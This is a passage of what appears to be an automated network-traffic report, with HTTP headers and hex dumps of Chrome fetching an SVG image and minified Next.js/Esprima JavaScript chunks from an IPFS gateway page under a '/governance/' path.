                                                                                                                                                                                                                                                  2024-09-28 04:11:54 UTC152INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 38 30 30 22 20 68 65 69 67 68 74 3d 22 38 30 30 22 3e 3c 64 65 66 73 3e 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 69 64 3d 22 62 22 20 78 31 3d 22 2e 39 30 37 22 20 79 31 3d 22 2e 32 32 37 22 20 78 32 3d 22 2e 31 36 33 22 20 79 32 3d 22 2e 38 35 33 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 6f 62 6a
                                                                                                                                                                                                                                                  Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="800" height="800"><defs><linearGradient id="b" x1=".907" y1=".227" x2=".163" y2=".853" gradientUnits="obj
                                                                                                                                                                                                                                                  2024-09-28 04:11:54 UTC1369INData Raw: 65 63 74 42 6f 75 6e 64 69 6e 67 42 6f 78 22 3e 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 30 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 62 36 35 30 39 65 22 2f 3e 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 32 65 62 61 63 36 22 2f 3e 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 3c 63 6c 69 70 50 61 74 68 20 69 64 3d 22 61 22 3e 3c 70 61 74 68 20 64 3d 22 4d 30 20 30 68 38 30 30 76 38 30 30 48 30 7a 22 2f 3e 3c 2f 63 6c 69 70 50 61 74 68 3e 3c 66 69 6c 74 65 72 20 69 64 3d 22 63 22 20 78 3d 22 32 35 31 2e 32 35 22 20 79 3d 22 31 38 32 2e 32 35 22 20 77 69 64 74 68 3d 22 32 39 38 2e 32 30 35 22 20 68 65 69 67 68 74 3d 22 34 33 34 2e 36 36 22 20 66 69 6c 74 65 72 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61
                                                                                                                                                                                                                                                  Data Ascii: ectBoundingBox"><stop offset="0" stop-color="#b6509e"/><stop offset="1" stop-color="#2ebac6"/></linearGradient><clipPath id="a"><path d="M0 0h800v800H0z"/></clipPath><filter id="c" x="251.25" y="182.25" width="298.205" height="434.66" filterUnits="userSpa
                                                                                                                                                                                                                                                  2024-09-28 04:11:54 UTC310INData Raw: 32 36 2e 34 31 20 33 30 2e 32 34 32 20 30 20 31 36 2e 36 36 31 20 31 31 2e 38 34 33 20 33 30 2e 32 31 36 20 32 36 2e 34 31 20 33 30 2e 32 31 36 20 31 34 2e 35 34 32 20 30 20 32 36 2e 33 36 37 2d 31 33 2e 35 35 35 20 32 36 2e 33 36 37 2d 33 30 2e 32 31 36 2d 2e 30 30 33 2d 31 36 2e 36 37 38 2d 31 31 2e 38 32 38 2d 33 30 2e 32 34 32 2d 32 36 2e 33 36 37 2d 33 30 2e 32 34 32 5a 6d 2d 31 30 39 2e 35 20 30 63 2d 31 34 2e 35 33 33 20 30 2d 32 36 2e 33 36 37 20 31 33 2e 35 36 34 2d 32 36 2e 33 36 37 20 33 30 2e 32 34 32 20 30 20 31 36 2e 36 36 31 20 31 31 2e 38 33 34 20 33 30 2e 32 31 36 20 32 36 2e 33 36 37 20 33 30 2e 32 31 36 73 32 36 2e 33 37 35 2d 31 33 2e 35 35 35 20 32 36 2e 33 37 35 2d 33 30 2e 32 31 36 63 2d 2e 30 30 31 2d 31 36 2e 36 37 38 2d 31 31 2e
                                                                                                                                                                                                                                                  Data Ascii: 26.41 30.242 0 16.661 11.843 30.216 26.41 30.216 14.542 0 26.367-13.555 26.367-30.216-.003-16.678-11.828-30.242-26.367-30.242Zm-109.5 0c-14.533 0-26.367 13.564-26.367 30.242 0 16.661 11.834 30.216 26.367 30.216s26.375-13.555 26.375-30.216c-.001-16.678-11.


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  110192.168.2.549838209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:54 UTC851OUTGET /_next/static/chunks/8806.6223602df2ea965f.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/governance/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  Range: bytes=278528-278528
                                                                                                                                                                                                                                                  If-Range: "bafybeiby56gifjcmw44oaozvuvrqii2xjzltnpx42jkfo6vgih2b445vrq"
                                                                                                                                                                                                                                                  2024-09-28 04:11:54 UTC1369INHTTP/1.1 206 Partial Content
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:54 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 1
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafybeiby56gifjcmw44oaozvuvrqii2xjzltnpx42jkfo6vgih2b445vrq"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/8806.6223602df2ea965f.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafybeiby56gifjcmw44oaozvuvrqii2xjzltnpx42jkfo6vgih2b445vrq
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-04
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 13028488
                                                                                                                                                                                                                                                  2024-09-28 04:11:54 UTC95INData Raw: 43 6f 6e 74 65 6e 74 2d 52 61 6e 67 65 3a 20 62 79 74 65 73 20 32 37 38 35 32 38 2d 32 37 38 35 32 38 2f 33 30 34 33 31 31 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 36 33 66 62 31 34 37 63 66 30 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Content-Range: bytes 278528-278528/304311Server: cloudflareCF-RAY: 8ca0e463fb147cf0-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:54 UTC1INData Raw: 2c
                                                                                                                                                                                                                                                  Data Ascii: ,


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  111192.168.2.549836209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:54 UTC754OUTGET /_next/static/chunks/9f96d65d-7b812644c8c0f1f1.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/governance/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:54 UTC1365INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:54 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 135526
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreidxm67js666untmhrkh2bukbwirkmedsnrkycne3fpo52vwfic6u4"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/9f96d65d-7b812644c8c0f1f1.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreidxm67js666untmhrkh2bukbwirkmedsnrkycne3fpo52vwfic6u4
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-04
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 13026985
                                                                                                                                                                                                                                                  2024-09-28 04:11:54 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 36 33 65 64 65 63 34 33 61 62 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e463edec43ab-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:54 UTC1369INData Raw: 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 36 31 34 36 5d 2c 7b 33 31 30 37 32 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 69 28 73 29 7b 69 66 28 74 5b 73 5d 29 72 65 74 75 72 6e 20 74 5b 73 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 72 3d 74 5b 73 5d 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 2c 69 64 3a 73 2c 6c 6f 61 64 65 64 3a 21 31 7d 3b 72 65 74 75 72 6e 20 65 5b 73 5d 2e 63 61 6c 6c 28 72 2e 65 78 70 6f 72 74 73 2c 72 2c 72 2e 65 78 70 6f 72 74 73 2c 69 29 2c 72 2e 6c
                                                                                                                                                                                                                                                  Data Ascii: (self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[6146],{31072:function(e){var t;t=function(){return function(e){var t={};function i(s){if(t[s])return t[s].exports;var r=t[s]={exports:{},id:s,loaded:!1};return e[s].call(r.exports,r,r.exports,i),r.l
                                                                                                                                                                                                                                                  2024-09-28 04:11:54 UTC1369INData Raw: 61 6e 64 6c 65 72 2e 74 6f 6c 65 72 61 6e 74 26 26 28 73 2e 65 72 72 6f 72 73 3d 72 2e 65 72 72 6f 72 73 28 29 29 2c 73 7d 3b 76 61 72 20 75 3d 69 28 32 29 3b 74 2e 53 79 6e 74 61 78 3d 75 2e 53 79 6e 74 61 78 2c 74 2e 76 65 72 73 69 6f 6e 3d 22 34 2e 30 2e 31 22 7d 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 69 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 3b 76 61 72 20 73 3d 69 28 32 29 2c 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 74 68 69 73 2e 61 74 74 61 63 68 3d 21 31 2c 74 68 69 73 2e 63 6f 6d 6d 65 6e 74 73 3d 5b 5d 2c 74 68 69 73 2e 73 74 61 63 6b 3d 5b 5d 2c 74 68 69 73
                                                                                                                                                                                                                                                  Data Ascii: andler.tolerant&&(s.errors=r.errors()),s};var u=i(2);t.Syntax=u.Syntax,t.version="4.0.1"},function(e,t,i){"use strict";Object.defineProperty(t,"__esModule",{value:!0});var s=i(2),r=function(){function e(){this.attach=!1,this.comments=[],this.stack=[],this
                                                                                                                                                                                                                                                  2024-09-28 04:11:54 UTC1369INData Raw: 65 61 64 69 6e 67 43 6f 6d 6d 65 6e 74 73 26 26 30 3d 3d 3d 74 2e 6c 65 61 64 69 6e 67 43 6f 6d 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 64 65 6c 65 74 65 20 74 2e 6c 65 61 64 69 6e 67 43 6f 6d 6d 65 6e 74 73 2c 69 7d 66 6f 72 28 73 3d 74 68 69 73 2e 6c 65 61 64 69 6e 67 2e 6c 65 6e 67 74 68 2d 31 3b 73 3e 3d 30 3b 2d 2d 73 29 7b 76 61 72 20 6e 3b 28 6e 3d 74 68 69 73 2e 6c 65 61 64 69 6e 67 5b 73 5d 29 2e 73 74 61 72 74 3c 3d 65 2e 73 74 61 72 74 2e 6f 66 66 73 65 74 26 26 28 69 2e 75 6e 73 68 69 66 74 28 6e 2e 63 6f 6d 6d 65 6e 74 29 2c 74 68 69 73 2e 6c 65 61 64 69 6e 67 2e 73 70 6c 69 63 65 28 73 2c 31 29 29 7d 72 65 74 75 72 6e 20 69 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 76 69 73 69 74 4e 6f 64 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69
                                                                                                                                                                                                                                                  Data Ascii: eadingComments&&0===t.leadingComments.length&&delete t.leadingComments,i}for(s=this.leading.length-1;s>=0;--s){var n;(n=this.leading[s]).start<=e.start.offset&&(i.unshift(n.comment),this.leading.splice(s,1))}return i},e.prototype.visitNode=function(e,t){i
                                                                                                                                                                                                                                                  2024-09-28 04:11:54 UTC1369INData Raw: 6d 65 6e 74 3a 22 42 6c 6f 63 6b 53 74 61 74 65 6d 65 6e 74 22 2c 42 69 6e 61 72 79 45 78 70 72 65 73 73 69 6f 6e 3a 22 42 69 6e 61 72 79 45 78 70 72 65 73 73 69 6f 6e 22 2c 42 72 65 61 6b 53 74 61 74 65 6d 65 6e 74 3a 22 42 72 65 61 6b 53 74 61 74 65 6d 65 6e 74 22 2c 43 61 6c 6c 45 78 70 72 65 73 73 69 6f 6e 3a 22 43 61 6c 6c 45 78 70 72 65 73 73 69 6f 6e 22 2c 43 61 74 63 68 43 6c 61 75 73 65 3a 22 43 61 74 63 68 43 6c 61 75 73 65 22 2c 43 6c 61 73 73 42 6f 64 79 3a 22 43 6c 61 73 73 42 6f 64 79 22 2c 43 6c 61 73 73 44 65 63 6c 61 72 61 74 69 6f 6e 3a 22 43 6c 61 73 73 44 65 63 6c 61 72 61 74 69 6f 6e 22 2c 43 6c 61 73 73 45 78 70 72 65 73 73 69 6f 6e 3a 22 43 6c 61 73 73 45 78 70 72 65 73 73 69 6f 6e 22 2c 43 6f 6e 64 69 74 69 6f 6e 61 6c 45 78 70 72
                                                                                                                                                                                                                                                  Data Ascii: ment:"BlockStatement",BinaryExpression:"BinaryExpression",BreakStatement:"BreakStatement",CallExpression:"CallExpression",CatchClause:"CatchClause",ClassBody:"ClassBody",ClassDeclaration:"ClassDeclaration",ClassExpression:"ClassExpression",ConditionalExpr
                                                                                                                                                                                                                                                  2024-09-28 04:11:54 UTC1369INData Raw: 79 22 2c 52 65 73 74 45 6c 65 6d 65 6e 74 3a 22 52 65 73 74 45 6c 65 6d 65 6e 74 22 2c 52 65 74 75 72 6e 53 74 61 74 65 6d 65 6e 74 3a 22 52 65 74 75 72 6e 53 74 61 74 65 6d 65 6e 74 22 2c 53 65 71 75 65 6e 63 65 45 78 70 72 65 73 73 69 6f 6e 3a 22 53 65 71 75 65 6e 63 65 45 78 70 72 65 73 73 69 6f 6e 22 2c 53 70 72 65 61 64 45 6c 65 6d 65 6e 74 3a 22 53 70 72 65 61 64 45 6c 65 6d 65 6e 74 22 2c 53 75 70 65 72 3a 22 53 75 70 65 72 22 2c 53 77 69 74 63 68 43 61 73 65 3a 22 53 77 69 74 63 68 43 61 73 65 22 2c 53 77 69 74 63 68 53 74 61 74 65 6d 65 6e 74 3a 22 53 77 69 74 63 68 53 74 61 74 65 6d 65 6e 74 22 2c 54 61 67 67 65 64 54 65 6d 70 6c 61 74 65 45 78 70 72 65 73 73 69 6f 6e 3a 22 54 61 67 67 65 64 54 65 6d 70 6c 61 74 65 45 78 70 72 65 73 73 69 6f 6e
                                                                                                                                                                                                                                                  Data Ascii: y",RestElement:"RestElement",ReturnStatement:"ReturnStatement",SequenceExpression:"SequenceExpression",SpreadElement:"SpreadElement",Super:"Super",SwitchCase:"SwitchCase",SwitchStatement:"SwitchStatement",TaggedTemplateExpression:"TaggedTemplateExpression
                                                                                                                                                                                                                                                  2024-09-28 04:11:54 UTC1369INData Raw: 72 6e 20 74 7d 68 2e 54 6f 6b 65 6e 4e 61 6d 65 5b 31 30 30 5d 3d 22 4a 53 58 49 64 65 6e 74 69 66 69 65 72 22 2c 68 2e 54 6f 6b 65 6e 4e 61 6d 65 5b 31 30 31 5d 3d 22 4a 53 58 54 65 78 74 22 3b 76 61 72 20 70 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 2c 69 2c 73 29 7b 72 65 74 75 72 6e 20 65 2e 63 61 6c 6c 28 74 68 69 73 2c 74 2c 69 2c 73 29 7c 7c 74 68 69 73 7d 72 65 74 75 72 6e 20 73 28 74 2c 65 29 2c 74 2e 70 72 6f 74 6f 74 79 70 65 2e 70 61 72 73 65 50 72 69 6d 61 72 79 45 78 70 72 65 73 73 69 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 6d 61 74 63 68 28 22 3c 22 29 3f 74 68 69 73 2e 70 61 72 73 65 4a 53 58 52 6f 6f 74 28 29 3a 65 2e 70 72 6f 74 6f 74 79 70 65 2e 70 61 72 73 65 50 72
                                                                                                                                                                                                                                                  Data Ascii: rn t}h.TokenName[100]="JSXIdentifier",h.TokenName[101]="JSXText";var p=function(e){function t(t,i,s){return e.call(this,t,i,s)||this}return s(t,e),t.prototype.parsePrimaryExpression=function(){return this.match("<")?this.parseJSXRoot():e.prototype.parsePr
                                                                                                                                                                                                                                                  2024-09-28 04:11:54 UTC1369INData Raw: 43 68 61 72 61 63 74 65 72 2e 69 73 48 65 78 44 69 67 69 74 28 6f 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 29 29 7d 7d 69 66 28 69 26 26 73 26 26 74 2e 6c 65 6e 67 74 68 3e 32 29 7b 76 61 72 20 75 3d 74 2e 73 75 62 73 74 72 28 31 2c 74 2e 6c 65 6e 67 74 68 2d 32 29 3b 6e 26 26 75 2e 6c 65 6e 67 74 68 3e 31 3f 74 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 70 61 72 73 65 49 6e 74 28 75 2e 73 75 62 73 74 72 28 31 29 2c 31 30 29 29 3a 61 26 26 75 2e 6c 65 6e 67 74 68 3e 32 3f 74 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 70 61 72 73 65 49 6e 74 28 22 30 22 2b 75 2e 73 75 62 73 74 72 28 31 29 2c 31 36 29 29 3a 6e 7c 7c 61 7c 7c 21 63 2e 58 48 54 4d 4c 45 6e 74 69 74 69 65 73 5b 75 5d 7c 7c 28 74 3d 63 2e 58 48 54 4d 4c
                                                                                                                                                                                                                                                  Data Ascii: Character.isHexDigit(o.charCodeAt(0)))}}if(i&&s&&t.length>2){var u=t.substr(1,t.length-2);n&&u.length>1?t=String.fromCharCode(parseInt(u.substr(1),10)):a&&u.length>2?t=String.fromCharCode(parseInt("0"+u.substr(1),16)):n||a||!c.XHTMLEntities[u]||(t=c.XHTML
                                                                                                                                                                                                                                                  2024-09-28 04:11:54 UTC1369INData Raw: 74 68 69 73 2e 73 63 61 6e 6e 65 72 2e 69 6e 64 65 78 2c 65 6e 64 3a 74 68 69 73 2e 73 63 61 6e 6e 65 72 2e 69 6e 64 65 78 7d 3b 69 66 28 72 2e 43 68 61 72 61 63 74 65 72 2e 69 73 49 64 65 6e 74 69 66 69 65 72 53 74 61 72 74 28 65 29 26 26 39 32 21 3d 3d 65 29 7b 66 6f 72 28 74 3d 74 68 69 73 2e 73 63 61 6e 6e 65 72 2e 69 6e 64 65 78 2c 2b 2b 74 68 69 73 2e 73 63 61 6e 6e 65 72 2e 69 6e 64 65 78 3b 21 74 68 69 73 2e 73 63 61 6e 6e 65 72 2e 65 6f 66 28 29 3b 29 7b 76 61 72 20 75 3d 74 68 69 73 2e 73 63 61 6e 6e 65 72 2e 73 6f 75 72 63 65 2e 63 68 61 72 43 6f 64 65 41 74 28 74 68 69 73 2e 73 63 61 6e 6e 65 72 2e 69 6e 64 65 78 29 3b 69 66 28 72 2e 43 68 61 72 61 63 74 65 72 2e 69 73 49 64 65 6e 74 69 66 69 65 72 50 61 72 74 28 75 29 26 26 39 32 21 3d 3d 75
                                                                                                                                                                                                                                                  Data Ascii: this.scanner.index,end:this.scanner.index};if(r.Character.isIdentifierStart(e)&&92!==e){for(t=this.scanner.index,++this.scanner.index;!this.scanner.eof();){var u=this.scanner.source.charCodeAt(this.scanner.index);if(r.Character.isIdentifierPart(u)&&92!==u
                                                                                                                                                                                                                                                  2024-09-28 04:11:54 UTC1369INData Raw: 63 61 6e 6e 65 72 2e 6c 69 6e 65 4e 75 6d 62 65 72 2c 22 5c 72 22 3d 3d 3d 69 26 26 22 5c 6e 22 3d 3d 3d 74 68 69 73 2e 73 63 61 6e 6e 65 72 2e 73 6f 75 72 63 65 5b 74 68 69 73 2e 73 63 61 6e 6e 65 72 2e 69 6e 64 65 78 5d 26 26 2b 2b 74 68 69 73 2e 73 63 61 6e 6e 65 72 2e 69 6e 64 65 78 2c 74 68 69 73 2e 73 63 61 6e 6e 65 72 2e 6c 69 6e 65 53 74 61 72 74 3d 74 68 69 73 2e 73 63 61 6e 6e 65 72 2e 69 6e 64 65 78 29 7d 74 68 69 73 2e 6c 61 73 74 4d 61 72 6b 65 72 2e 69 6e 64 65 78 3d 74 68 69 73 2e 73 63 61 6e 6e 65 72 2e 69 6e 64 65 78 2c 74 68 69 73 2e 6c 61 73 74 4d 61 72 6b 65 72 2e 6c 69 6e 65 3d 74 68 69 73 2e 73 63 61 6e 6e 65 72 2e 6c 69 6e 65 4e 75 6d 62 65 72 2c 74 68 69 73 2e 6c 61 73 74 4d 61 72 6b 65 72 2e 63 6f 6c 75 6d 6e 3d 74 68 69 73 2e 73
                                                                                                                                                                                                                                                  Data Ascii: canner.lineNumber,"\r"===i&&"\n"===this.scanner.source[this.scanner.index]&&++this.scanner.index,this.scanner.lineStart=this.scanner.index)}this.lastMarker.index=this.scanner.index,this.lastMarker.line=this.scanner.lineNumber,this.lastMarker.column=this.s


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  112192.168.2.549837209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:54 UTC750OUTGET /_next/static/chunks/9072-51cf922cfdeaf6b4.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/governance/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:54 UTC1358INHTTP/1.1 200 OK
